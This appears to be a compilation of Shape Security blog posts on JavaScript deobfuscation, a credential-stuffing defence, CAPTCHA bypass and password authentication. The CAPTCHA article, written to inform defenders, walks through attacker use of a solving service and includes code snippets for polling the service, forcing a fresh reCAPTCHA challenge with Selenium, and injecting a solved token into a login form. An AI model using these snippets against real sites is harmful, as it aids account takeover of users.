Introducing Unminify

Shape Security is proud to announce the release of Unminify, our new open source tool for the automatic cleanup and deobfuscation of JavaScript.

Example

Given

function validate(i){var _=["no","ok"];return log(i),isValid(i)?_[1]:_[0]}

Unminify produces

function validate(i) {
  log(i);
  if (isValid(i)) {
    return 'ok';
  } else {
    return 'no';
  }
}

Installation and usage

Unminify is a node.js module and is available on npm. It can be installed globally with npm install -g unminify and then executed as unminify file.js, or executed without installation as npx unminify file.js. It is also suitable for use as a library. For more, see the readme.

Unminify supports several levels of transformation, depending on how strictly the original semantics of the program need to be preserved. Some transformations can alter some or all of the program's behavior under some circumstances; these are disabled by default.

Background

JavaScript differs from most programming languages in that it has no portable compiled form: the language which humans write is the same as the language which browsers download and execute.

In modern JavaScript development, however, there is still usually at least one compilation step. Experienced JavaScript developers are probably familiar with tools like UglifyJS, which are designed to transform JavaScript source files to minimize the space they take up while retaining their functionality, allowing humans to write readable code without sending extraneous information like comments and whitespace to browsers. In addition, UglifyJS transforms the underlying structure (the abstract syntax tree, or AST) of the source code: for example, it rewrites if (a) { b(); c(); } to the equivalent a&&(b(),c()) anywhere such a construct occurs in the source. Code which has been processed by such tools is generally significantly less readable; however, that is not necessarily a goal of UglifyJS and similar minifiers.

In other cases, the explicit goal is to obfuscate code (i.e., to render it difficult for humans and/or machines to analyze). In practice, most tools for this are not significantly more advanced than UglifyJS. Such tools generally operate by transforming the source code in one or more passes, each pass applying a specific technique intended to obscure the program's behavior. A careful human can effectively undo these by hand, given time proportional to the size of the program.

Simple examples

Suppose our original program is as follows:

function validate(input) {
  log(input);
  if (isValid(input)) {
    return 'ok';
  } else {
    return 'no';
  }
}

UglifyJS will turn this into

function validate(i){return log(i),isValid(i)?"ok":"no"}

and an obfuscation tool might further rewrite this to

function validate(i){var _=["no","ok"];return log(i),isValid(i)?_[1]:_[0]}

State of the art

There are well-established tools like Prettier for formatting JavaScript source by adding whitespace and other non-semantic syntax to improve readability. These undo half of what a tool like UglifyJS does, but because they are intended for use by developers on their own code rather than for analysis of code produced elsewhere, they do not transform the underlying structure. Running Prettier on the above example gives

function validate(i) {
  var _ = ["no", "ok"];
  return log(i), isValid(i) ? _[1] : _[0];
}

Other tools like JSTillery and JSNice do offer some amount of transformation of the structure of the code. However, in practice they tend to be quite limited. In our example above, JSTillery produces

function validate(i)
    /*Scope Closed:false | writes:false*/
    {
        return log(i), isValid(i) ? 'ok' : 'no';
    }

and JSNice produces

function validate(i) {
  var _ = ["no", "ok"];
  return log(i), isValid(i) ? _[1] : _[0];
}

Unminify

Unminify is our contribution to this space. It can undo most of the transformations applied by UglifyJS and by simple obfuscation tools. On our example above, given the right options it will fully restore the original program except for the name of the local variable input, which is not recoverable:

function validate(i) {
  log(i);
  if (isValid(i)) {
    return 'ok';
  } else {
    return 'no';
  }
}

Unminify is built on top of our open source Shift family of tools for the analysis and transformation of JavaScript.

Operation

The basic operation of Unminify consists of parsing the code to an AST, applying a series of transformations to that AST iteratively until no further changes are possible, and then generating JavaScript source from the final AST. These transformations are merely functions which consume a Shift AST and produce a Shift AST.
This process is handled well by the Shift family, which makes it simple to write and, crucially, to reason about analysis and transformation passes on JavaScript source. There is very little magic under the hood.
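
In code, the overall pipeline looks roughly like the sketch below. This is a simplified illustration rather than Unminify's actual source: it assumes the published shift-parser and shift-codegen packages (parseScript and the default code-generator export), and treats passes as an array of AST-to-AST functions that return a new tree only when they change something.

const { parseScript } = require('shift-parser');
const codegen = require('shift-codegen').default;

// Parse, apply every pass repeatedly until the tree stops changing, then print.
function unminifySketch(source, passes) {
  let tree = parseScript(source);            // JavaScript source -> Shift AST
  let changed = true;
  while (changed) {
    changed = false;
    for (const pass of passes) {
      const next = pass(tree);               // each pass: Shift AST in, Shift AST out
      if (next !== tree) {
        tree = next;
        changed = true;
      }
    }
  }
  return codegen(tree);                      // final Shift AST -> JavaScript source
}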

Unminify has support for adding additional transformation passes to its pipeline. These can be passed with the --additional-transform transform.js flag, where transform.js is a file exporting a transformation function. If you develop a transformation which is generally useful, we encourage you to contribute it!
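
As a hedged example, a transform.js along the following lines could rewrite void 0 back to undefined. The node shapes used here (UnaryExpression, LiteralNumericExpression, IdentifierExpression) follow the Shift AST specification; the rest is illustrative and is not taken from Unminify's own passes.

'use strict';

// Recursively rebuild the tree, replacing `void 0` with `undefined`.
// Returns the original node untouched when nothing changes, so an
// iterate-to-fixed-point driver can tell whether progress was made.
function rewriteVoidZero(node) {
  if (node === null || typeof node !== 'object') return node;
  if (Array.isArray(node)) {
    const mapped = node.map(rewriteVoidZero);
    return mapped.some((item, i) => item !== node[i]) ? mapped : node;
  }
  if (
    node.type === 'UnaryExpression' &&
    node.operator === 'void' &&
    node.operand.type === 'LiteralNumericExpression' &&
    node.operand.value === 0
  ) {
    return { type: 'IdentifierExpression', name: 'undefined' };
  }
  let changed = false;
  const rebuilt = {};
  for (const key of Object.keys(node)) {
    rebuilt[key] = rewriteVoidZero(node[key]);
    if (rebuilt[key] !== node[key]) changed = true;
  }
  return changed ? rebuilt : node;
}

module.exports = rewriteVoidZero;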

Introducing Blackfish, a system to help eliminate the use of stolen passwords

Today we’re releasing Blackfish, a system that proactively protects companies from credential stuffing before an attack takes place. Normally, credential stuffing starts with a data breach at one major company (“Initial Victim”), and continues when a criminal then uses the stolen data (usernames and passwords) against dozens or even hundreds of different companies (“Downstream Victims”). Usually, many months or years pass before the Initial Victim realizes and discloses the initial data breach, and in that time, criminals are able to successfully attack huge numbers of Downstream Victims. Later, once the Initial Victim does disclose the breach, the Downstream Victims start matching the username/password pairs from the Initial Victim against their own user databases, and resetting any passwords that match. The whole process can take years and results in hundreds of millions of dollars worth of fraud and brand damage.

Blackfish changes all that. From the very first moment a criminal attempts to use stolen usernames and passwords, Blackfish begins monitoring and protecting matching accounts at other companies. So, while under normal circumstances a criminal can get hundreds of chances to monetize the stolen usernames and passwords, with Blackfish in place, criminals get far fewer chances.

You may be wondering how Blackfish can accomplish all this. Explaining that requires a little background on Shape Security.

We founded Shape six years ago to answer a simple question: is a visitor to a web or mobile app an actual human being? This simple question proved to be an important one. As we perfected our ability to answer it, we started eliminating enormous amounts of fraudulent traffic from the largest web and mobile apps in the world — often 90% or more of the login traffic from a Fortune 100 web application.

Today, we are the primary line of defense for many of the largest organizations around the world. Our customers include: three of the top four banks, three of the top five airlines, two of the top three hotel chains, and numerous other leading companies and government agencies.

We secure all of those large organizations in a centralized way, directly delivering the security outcome of eliminating fraudulent traffic. That centralized security capability is also the heart of Blackfish, and allows Blackfish to see stolen usernames and passwords in use far before anyone else ever knows about them (including the Initial Victim).

Think about it: if you were a criminal and managed to steal all the usernames and passwords from a major corporation, where would you try them out? If you’re like most criminals, the answer is that you’d try them on the largest banks, airlines, hotels, and retail sites in the world. That’s what happens in practice, and when it does, that’s also when Blackfish sees the very first such attack, and sets about protecting all username/password pairs that happen to match on other large websites.

Blackfish does all this before the original data breach is reported or even detected by the Initial Victim company.

The problem with looking for credentials on the dark web

You can scour the dark web to find user credentials, but one of the greatest dangers companies face today is the long window of time between when breaches occur on third-party websites like Yahoo, and when those breaches are discovered and announced. Instead of hoping that stolen passwords will appear in the dark web in time to be useful, Blackfish autonomously detects credential stuffing attacks on the largest, most targeted websites in the world, identifies newly stolen credentials, and nullifies them globally. That stolen data becomes useless to cybercriminals.

How does it work?

Shape has grown into one of the largest processors of login traffic on the entire web. We have built machine learning and deep learning systems to autonomously identify credential stuffing attacks in real-time. These systems now generate an important byproduct: direct knowledge of stolen usernames and passwords when criminals are first starting to exploit them against major web and mobile apps. What this means is that we see the stolen assets months or years before they appear on the dark web.

Blackfish's knowledge base of compromised credentials is built with maximum security in mind: rather than storing any credential information, it uses Bloom filters to build probabilistic data structures that can answer membership queries without retaining the underlying values. As a result, the compromised credentials themselves are never stored anywhere, and Blackfish can use knowledge of a compromise to improve security while maintaining full data privacy.
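
To illustrate the idea (this is a toy sketch, not Blackfish's implementation), a Bloom filter lets a service record that a credential pair has been seen in an attack and later test a login attempt against that record, without ever storing the username or password:

const crypto = require('crypto');

// A minimal Bloom filter: k hash positions per item over a fixed bit array.
class BloomFilter {
  constructor(bits = 1 << 20, hashes = 4) {
    this.bits = bits;
    this.hashes = hashes;
    this.buffer = Buffer.alloc(bits >> 3);
  }
  positions(item) {
    const out = [];
    for (let i = 0; i < this.hashes; i++) {
      const digest = crypto.createHash('sha256').update(`${i}:${item}`).digest();
      out.push(digest.readUInt32BE(0) % this.bits);
    }
    return out;
  }
  add(item) {
    for (const p of this.positions(item)) this.buffer[p >> 3] |= 1 << (p & 7);
  }
  mightContain(item) {
    return this.positions(item).every(p => (this.buffer[p >> 3] & (1 << (p & 7))) !== 0);
  }
}

// Record a credential pair observed in an attack, then test later login attempts.
const seen = new BloomFilter();
seen.add('alice@example.com:hunter2');
console.log(seen.mightContain('alice@example.com:hunter2')); // true
console.log(seen.mightContain('bob@example.com:letmein'));   // false (with high probability)

Membership tests can return occasional false positives, but the original usernames and passwords cannot be recovered from the filter, which is the property that preserves data privacy.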

What good is a stolen password if you can never use it?

For better or for worse, memorized secrets (a.k.a. “passwords”) are the most widely used authentication mechanism online. As such, having access to millions of stolen passwords (over 3.3 billion were reported stolen in 2016 alone) allows cybercriminals to easily take over users’ accounts on any major website. They do this with credential stuffing attacks, which take stolen passwords from website A and try them on website B to see which accounts the same email addresses and passwords will unlock. Cybercriminals can do this reliably with a typical 1-2% success rate, allowing them to seize the value in bank accounts, gift card accounts, airline loyalty programs, and other accounts, which they can then monetize for a predictable ROI.

Since credential stuffing attacks are responsible for more than 99.9% of account takeover attempts, if we identify the stolen credentials that are used in these attacks, and invalidate them across other websites, we change the economics for cybercriminals significantly. If their 1-2% success rate now drops by two orders of magnitude or more, their “business” no longer functions. At that point, the cybercriminal has no choice but to try to obtain new stolen passwords. If those new passwords are similarly detected and invalidated, it will become clear to the criminals that the economics of their scheme have been broken. We think that over time, Blackfish will end credential stuffing for everyone.

We are all very excited at Shape to announce this system and our vision to make credential stuffing attacks a thing of the past. You can learn more on our website and contact us when your company is ready to try Blackfish.

How Cybercriminals Bypass CAPTCHA

One thing the world can consistently agree on is that CAPTCHAs are annoying. The puzzle always appears in the most inconvenient of places. Online gift card purchases. Creating an account on an ecommerce webpage. Typing in those hard-to-memorize credentials one too many times.

But the ultimate frustration about CAPTCHA is that it serves absolutely no purpose. The CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), was originally designed to prevent bots, malware, and artificial intelligence (AI) from interacting with a web page. In the 90s, this meant preventing spam bots. These days, organizations use CAPTCHA in an attempt to prevent more sinister automated attacks like credential stuffing.

Almost as soon as CAPTCHA was introduced, however, cybercriminals developed effective methods to bypass it. The good guys responded with “hardened” CAPTCHAs but the result remains the same: the test that attempts to stop automation is circumvented with automation.

There are multiple ways CAPTCHA can be defeated. A common method is to use a CAPTCHA solving service, which utilizes low-cost human labor in developing countries to solve CAPTCHA images. Cybercriminals subscribe to such a service for CAPTCHA solutions, which they feed into their automation tools via APIs, populating the answers on the target website. These shady enterprises are so ubiquitous that many can be found with a quick Google search, including:

  • DeathbyCAPTCHA
  • 2Captcha
  • Kolotibablo
  • ProTypers
  • Antigate

This article will use 2Captcha to demonstrate how attackers integrate the solution to orchestrate credential stuffing attacks.

2Captcha

Upon accessing the site 2Captcha.com, the viewer is greeted with the image below, asking whether the visitor wants to 1) work for 2Captcha or 2) purchase 2Captcha as a service.

[Image: the 2Captcha.com homepage, offering visitors the choice to work for 2Captcha or to purchase it as a service]

Option 1 – Work for 2Captcha

To work for 2Captcha, simply register for an account, providing an email address and PayPal account for payment deposits. During a test, an account was validated within minutes.

New workers must take a one-time training course that teaches them how to quickly solve CAPTCHAs. It also provides tips such as when case does and doesn’t matter. After completing the training with sufficient accuracy, the worker can start earning money.

[Image: the 2Captcha worker workspace screen]

After selecting “Start Work,” the worker is taken to the workspace screen, which is depicted above. The worker is then provided a CAPTCHA and prompted to submit a solution. Once solved correctly, money is deposited into an electronic “purse,” and the worker can request payout whenever they choose. There is seemingly no end to the number of CAPTCHAs that appear in the workspace, indicating a steady demand for the service.

[Animation: solving CAPTCHAs in the 2Captcha workspace]

2Captcha workers are incentivized to submit correct solutions much like an Uber driver is incentivized to provide excellent service—customer ratings. 2Captcha customers rate the accuracy of the CAPTCHA solutions they received. If a 2Captcha worker’s rating falls below a certain threshold, she will be kicked off the platform. Conversely, workers with the highest ratings will be rewarded during times of low demand by receiving priority in CAPTCHA distribution.

Option 2 – 2Captcha as a service

To use 2Captcha as a service, a customer (i.e., an attacker) integrates the 2Captcha API into her attack to create a digital supply chain, automatically feeding CAPTCHA puzzles from the target site and receiving solutions to input into the target site.

2Captcha helpfully provides example scripts to generate API calls in different programming languages, including C#, JavaScript, PHP, Python, and more. The example code written in Python has been reproduced below:

[Image: 2Captcha's example Python client code]

Integrating 2Captcha into an Automated Attack

How would an attacker use 2Captcha in a credential stuffing attack? The diagram below shows how the different entities interact in a CAPTCHA bypass process:

[Image: diagram of the interactions between the attacker, the target site, 2Captcha, and its workers]

Technical Process:

  1. The attacker requests the CAPTCHA iframe source and the URL used to embed the CAPTCHA image from the target site and saves them locally.
  2. The attacker requests an API token from the 2Captcha website.
  3. The attacker sends the CAPTCHA to the 2Captcha service using an HTTP POST and receives a CAPTCHA ID, a numerical ID associated with the submitted CAPTCHA image. The ID is used in step 5 for an API GET request to 2Captcha to retrieve the solved CAPTCHA.
  4. 2Captcha assigns the CAPTCHA to a worker, who solves it and submits the solution to 2Captcha.
  5. The attacker's script polls 2Captcha with the CAPTCHA ID every 5 seconds until the CAPTCHA is solved. While it is still being solved, 2Captcha responds with “CAPTCHA_NOT_READY” and the script tries again 5 seconds later; once solved, 2Captcha returns the solution.
  6. The attacker sends a login request to the target site with the fields filled out (i.e. a set of credentials from a stolen list) along with the CAPTCHA solution.
  7. The attacker repeats this process for each CAPTCHA image (a simplified sketch of steps 3 through 5 follows this list).
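
A hedged sketch of steps 3 through 5 is shown below, written against Node's built-in fetch (Node 18+). The submit and poll URLs and parameter names are placeholders standing in for 2Captcha's documented API, and apiKey and captchaImageBase64 are assumed inputs.

// Placeholder endpoints: consult 2Captcha's API documentation for the real ones.
const SUBMIT_URL = 'https://solving-service.example/submit';
const POLL_URL = 'https://solving-service.example/result';

async function solveCaptcha(apiKey, captchaImageBase64) {
  // Step 3: submit the CAPTCHA image and receive a numerical CAPTCHA ID.
  const submitted = await fetch(SUBMIT_URL, {
    method: 'POST',
    body: new URLSearchParams({ key: apiKey, body: captchaImageBase64 }),
  });
  const captchaId = (await submitted.text()).trim();

  // Step 5: poll every 5 seconds until a worker (step 4) has solved it.
  for (;;) {
    await new Promise(resolve => setTimeout(resolve, 5000));
    const poll = await fetch(`${POLL_URL}?key=${apiKey}&id=${captchaId}`);
    const answer = (await poll.text()).trim();
    if (answer !== 'CAPTCHA_NOT_READY') {
      return answer; // the solution, ready for the login request in step 6
    }
  }
}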

Combined with browser automation tools like Selenium or PhantomJS, an attacker can appear to interact with the target website in a human-like fashion, effectively bypassing many existing security measures to launch a credential stuffing attack.

Monetization & Criminal Ecosystem

With such an elegant solution in place, what does the financial ecosystem look like, and how do the parties each make money?

Monetization: CAPTCHA solver

Working as a CAPTCHA solver is far from lucrative. Based on the metrics provided on 2Captcha’s website, it’s possible to calculate the following payout:

Assuming it takes 6 seconds per CAPTCHA, a worker can submit 10 CAPTCHAs per minute, or 600 CAPTCHAs per hour. In an 8-hour day, that's 4800 CAPTCHAs. Based on what was earned during our trial as an employee for 2Captcha (roughly $0.0004 per solution), this equates to $1.92 per day.

This is a waste of time for individuals in developed countries, but for those who live in locales where a few dollars per day can go relatively far, CAPTCHA solving services are an easy way to make money.

Monetization: Attacker

The attacker pays the third party, 2Captcha, for CAPTCHA solutions in bundles of 1000. Attackers bid on the solutions, paying anywhere between $1 and $5 per bundle.

Many attackers use CAPTCHA-solving services as a component of a larger credential stuffing attack, which justifies the expense. For example, suppose an attacker is launching an attack to test one million credentials from Pastebin on a target site.  In this scenario, the attacker needs to bypass one CAPTCHA with each set of credentials, which would cost roughly $1000.  Assuming a 1.5% successful credential reuse rate, the attacker can take over 15,000 accounts, which can all be monetized.

Monetization: 2Captcha

2Captcha receives payment from the attacker on a per-1000-CAPTCHA basis. As mentioned above, customers (i.e. attackers) pay between $1 and $5 per 1000 CAPTCHAs. Services like 2Captcha then take a cut of the bid price and dole out the rest to their human workforce. Since CAPTCHA solving services operate at scale, the profits add up: even if 2Captcha only receives $1 per 1000 CAPTCHAs solved, it nets a minimum of 60 cents per bundle. The owners of these sites are often in developing countries themselves, so the seemingly low revenue is substantial.
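
Putting the figures above together gives a rough back-of-the-envelope view of how the money splits between the three parties (all numbers are the estimates quoted above, not measurements):

// Rough economics of the CAPTCHA-solving supply chain, using the figures above.
const workerPayPerSolution = 0.0004;                 // USD earned per solved CAPTCHA in our trial
const captchasPerDay = 4800;                         // 10 per minute over an 8-hour day
const workerDailyPay = workerPayPerSolution * captchasPerDay;              // ~ $1.92

const bundlePrice = 1.0;                             // low end of the $1-$5 bid per 1000 solutions
const serviceCutPerBundle = bundlePrice - workerPayPerSolution * 1000;     // ~ $0.60 kept by 2Captcha

const credentialsTested = 1000000;                   // credentials in the attacker's stolen list
const attackerCaptchaCost = (credentialsTested / 1000) * bundlePrice;      // ~ $1000
const accountsTakenOver = credentialsTested * 0.015;                       // 1.5% reuse rate ~ 15,000 accounts

console.log({ workerDailyPay, serviceCutPerBundle, attackerCaptchaCost, accountsTakenOver });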

What about Google’s Invisible reCAPTCHA?

In March of this year, Google released an upgraded version of its reCAPTCHA called “Invisible reCAPTCHA.” Unlike “no CAPTCHA reCAPTCHA,” which required all users to click the infamous “I’m not a Robot” button, Invisible reCAPTCHA allows known human users to pass through while only serving a reCAPTCHA image challenge to suspicious users.

You might think that this would stump attackers because they would not be able to see when they were being tested. Yet, just one day after Google introduced Invisible reCAPTCHA, 2Captcha wrote a blog post on how to beat it.

Google decides that a user is human partly on the basis of whether that user has previously visited the requested page, which it determines by checking the browser's cookies. If the same user starts using a new device or has recently cleared their cache, Google does not have that information and is forced to issue a reCAPTCHA challenge.

For an attacker to automate a credential stuffing attack using 2Captcha, he needs to guarantee a CAPTCHA challenge. Thus, one way to bypass Invisible reCAPTCHA is to add a line of code to the attack script that clears the browser with each request, guaranteeing a solvable reCAPTCHA challenge.
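
For example, with a browser automation library such as selenium-webdriver, each attempt can be made from a brand-new browser session with no stored history, so Google has nothing to consult and serves a solvable challenge; the login URL and surrounding steps here are illustrative:

const { Builder } = require('selenium-webdriver');

async function freshAttempt(loginUrl) {
  // Each build() launches a browser with a clean temporary profile, so no reCAPTCHA history exists.
  const driver = await new Builder().forBrowser('chrome').build();
  try {
    await driver.get(loginUrl);
    await driver.manage().deleteAllCookies(); // belt and braces: drop anything set during the visit
    // ...fill in a credential pair and hand the served challenge off to the solving service...
  } finally {
    await driver.quit(); // never reuse the session for the next attempt
  }
}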

The slightly tricky thing about Invisible reCAPTCHA is that the CAPTCHA challenge is hidden, but there is a workaround: the CAPTCHA can be “found” using the browser's “inspect element” tool. The attacker can then send a POST to 2Captcha that includes a parameter detailing where the hidden CAPTCHA is located. Once the attacker receives the CAPTCHA solution from 2Captcha, Invisible reCAPTCHA can be defeated via automation in one of two ways (the first is sketched after the list):

  1. A JavaScript action that calls a function to supply the solved token when the page form is submitted.
  2. An HTML change made directly in the webpage to substitute a snippet of the normal CAPTCHA code with the solved token input.
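
A minimal illustration of the first approach, assuming token holds the solved reCAPTCHA token returned by the solving service (reCAPTCHA places a hidden textarea with the id g-recaptcha-response on the page for exactly this value; the form selector is illustrative):

// Run in the page context once the solving service returns a token.
function submitWithToken(token) {
  const field = document.getElementById('g-recaptcha-response');
  field.value = token;                     // place the solved token where reCAPTCHA expects it
  document.querySelector('form').submit(); // then submit the login form as usual
}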

The fact that Invisible reCAPTCHA can be bypassed isn’t because there was a fatal flaw in the design of the newer CAPTCHA. It’s that any reverse Turing test is inherently beatable when the pass conditions are known.

As long as there are CAPTCHAs, there will be services like 2Captcha because the economics play so well into the criminals' hands. Taking advantage of low-cost human labor minimizes the cost of doing business and allows cybercriminals to reap profits that can run into the millions of dollars at scale. And there will always be regions of the world with cheap labor costs, so constant demand ensures constant supply on 2Captcha's side.

The world doesn’t need to develop a better CAPTCHA, since this entire approach has fundamental limitations. Instead, we should acknowledge those limitations and implement defenses where the pass conditions are unknown or are at least difficult for attackers to ascertain.

Learn More

Watch the video, “Learn How Cybercriminals Defeat CAPTCHA.”

World Kill the Password Day

This World Password Day, let’s examine why the world has not yet managed to kill the password.

Today is World Password Day. It’s also Star Wars Day, which will get far more attention from far more people (May the Fourth be with you). It also happens to be National Orange Juice Day. And a few other days. This confusion is appropriate for World Password Day, because while the occasion is about improving password habits, the world has turned decidedly against passwords. Headlines from the past few years demonstrate a consistent stream of invective toward them:

2013: “PayPal and Apple Want to Kill Your Password”
2014: “Inside Twitter’s ambitious plan to kill the password”
2015: “White House goal: Kill the password”
2016: “Google aims to kill passwords by the end of this year”
2017: “Facebook wants to kill the password”

And yet, not one of these efforts has succeeded in “killing the password”—as we can see from the fact that every major online service still requires them.

Why is this the case? To explore this question, it is useful to first examine the function that passwords serve. Online applications must ensure that only authorized users are able to access their data or functionality. In order to do this, the application requires some form of proof that the user who is accessing the application is who they say they are. Passwords are a “shared secret” between the authorized user and the application, and if the user accessing the application demonstrates they know this secret, the application assumes that they are the authorized user. Unfortunately, unauthorized users may learn this shared secret, through various types of attacks, so passwords simply do not provide a good proof of identity. And yet, the password continues to be the universal method of online authentication.

So what about all of the technologies that have gained popularity in recent years, like two-factor authentication using mobile devices and fingerprint scanners? Let’s take a look at some of these alternatives and why they haven’t been able to replace passwords.

Standard biometrics, like fingerprint and iris-based authentication, are convenient in that you always have them available on your person, but you obviously cannot change them. Soft biometrics, like voice and typing pattern analysis, are similarly convenient, but have too much variation to be used for anything but negative authentication. Hard and soft tokens, in the form of dedicated hardware or personal mobile devices, are inconvenient to access and often difficult to use. And finally, device-based authentication is also only suitable for negative authentication, since users have multiple devices or may lose their authorized device.

Some common benefits and drawbacks of these approaches start to emerge. This is because every system for authentication fits into the well-known framework of:

1. Something you know (such as a password)
2. Something you have (such as a mobile phone)
3. Something you are (such as a fingerprint)

The problem is that each part of this framework has different strengths and weaknesses. “Something you know” is convenient and changeable, but it can also be stolen easily, especially if copied somewhere and stored insecurely. “Something you have” is harder to steal, but is also not always with you. And “Something you are” is always available to you, but the description of what you are (say, a scan of your iris) cannot be changed if stolen from an insecure service that stored it. What this means is that the only true replacement for passwords will come from a mechanism that offers the same benefits as “something you know”, and yet somehow addresses its drawbacks.

Security challenge questions: the worst second factor

Some systems have tried to use security challenge questions as an additional authentication factor, especially for password recovery, but these are one of the worst developments in online security. Their problem is that they combine the drawbacks of passwords (answers can be stolen through data breaches), with the drawbacks of biometrics (you can’t change your mother’s maiden name or the street where you grew up), and add their own unique drawbacks (answers can be guessed through social media). Most security professionals now enter random information into such security challenge questions, but that effectively creates additional passwords, which offer no benefit over a single, strong password, except for use as a backup password.

But there is a more fundamental conflict which underpins our continued reliance on passwords: the fact that security and convenience are usually at odds. By moving toward three-factor authentication (one factor from each category), combining something like a password, a soft token, and a biometric, one can create a relatively secure authentication mechanism, but it is much less convenient for most users.

Users value convenience over security (yet still expect security)

For many years, the public has been learning of the need for everyone to select strong passwords. But most people still don’t. Recently, because of the Yahoo and other data breaches, the public started to learn that even if they select strong passwords, they should never reuse them across sites. But most people still do. Password managers aren’t silver bullets, and are subject to their own vulnerabilities, but their widespread use would dramatically improve both of the above issues. Unfortunately, most people don’t use them. Multi-factor authentication, specifically two-factor authentication using mobile phones, is now offered on most major online services. While everyone should enable it, most people won’t, due to the difficulty of use or the lack of convenience.

Security professionals and other security-conscious users are getting more and more options, but the average person continues to value convenience and ease of use above all else, and would like security to simply be provided for them automatically. They don’t want to have to take responsibility for preventing their online bank account from being hacked—they want the bank to take care of that.

In fact, since users will quickly abandon services that are too difficult to use, online services focus much more on improving usability than on security. This is illustrated by a step back in security that technology companies have taken over the years, by standardizing on the use of email addresses as usernames. In the past, you could set a unique username for each account, making it far more difficult for cybercriminals to gain access to your account on one service by stealing your credentials from another. But since remembering both usernames and passwords was hard for users, and online services needed users’ email addresses anyway, they have collectively chosen to consolidate the username and email address into a single identifier. This, of course, has fuelled credential stuffing attacks and automated fraud across all major online services, leveraging billions of spilled credentials through attack tools like Sentry MBA.

The future includes more passwords, for now

The reason that we still have passwords is because we as users continue to demand their advantages, and haven’t come up with anything that preserves those while addressing their drawbacks. Similar to Winston Churchill’s observation on democracy, we might say that passwords are the worst form of authentication—except for all the others that have been tried.

While users are becoming more security conscious, and are learning to accept the friction of multi-factor authentication for the benefit of security, a sea change in user behavior isn’t happening anytime soon. This shifts the burden for security and fraud protection back to online service providers. Given the constraint of delivering a friction-free experience to their users, they are now investing in layered, invisible security mechanisms. These mechanisms allow them to provide the benefits of passwords with defense against their drawbacks, by doing things such as detecting when stolen passwords are used (as recommended by NIST) or protecting against credential stuffing attacks.

It’s World Password Day. While technologies like Apple’s Touch ID afford us great conveniences, and may eventually result in many people being able to bypass re-entering their passwords much of the time, they do not replace those passwords. We’re not “killing” the password anytime soon, so this May 4th, let’s make sure we continue to promote good password practices.